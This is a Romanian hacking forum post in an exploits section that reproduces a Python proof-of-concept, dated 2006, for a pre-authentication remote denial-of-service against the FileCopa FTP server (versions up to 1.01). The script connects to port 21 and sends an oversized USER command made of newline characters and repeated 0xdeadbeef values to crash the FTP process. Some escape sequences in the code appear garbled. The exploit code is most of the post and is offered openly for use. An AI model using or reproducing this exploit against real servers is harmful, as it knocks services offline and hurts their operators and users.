Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
Kitana
Femeie
25 ani
Bucuresti
cauta Barbat
25 - 48 ani
Hacking and more... / Exploituri si POCs / FileCopa <= 1.01 (USER) Pre-Authentication Remote Overflow DoS Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 18 ani
Postari: 1896
### FILECOPA DOS
###
### Found Jan 19 2006, Tested again on the new release 6 April 2006
### BY Bigeazer
###

### They are selling this software for $39.95...
### oh well.. maybe they shoud fix it first?

#
# It appears that FileCopa does not handle alot of new line char
# in the USER login.  This is in the filecpnt.exe file.
#
# This is only a DOS, that kills the ftp process


import sys,os,string
import socket
import struct
import time

print "-------------------------------"
print "- FileCopa DOS"
print "- Found by: bigeazer"
print "- Should have crashed FileCopa"
print "-------------------------------"

buffer = "x0a" * 248 + struct.pack('<L',0xdeadbeef)  * 960
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    conn = s.connect((sys.argv[1],21))
except:
    print "- Unable to connect. exiting."
    sys.exit(1)

d = s.recv(1024)
time.sleep(1)
s.send('USER %srn' % buffer)
time.sleep(1)
sys.exit(0)


_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani
   
Pagini: 1  

Mergi la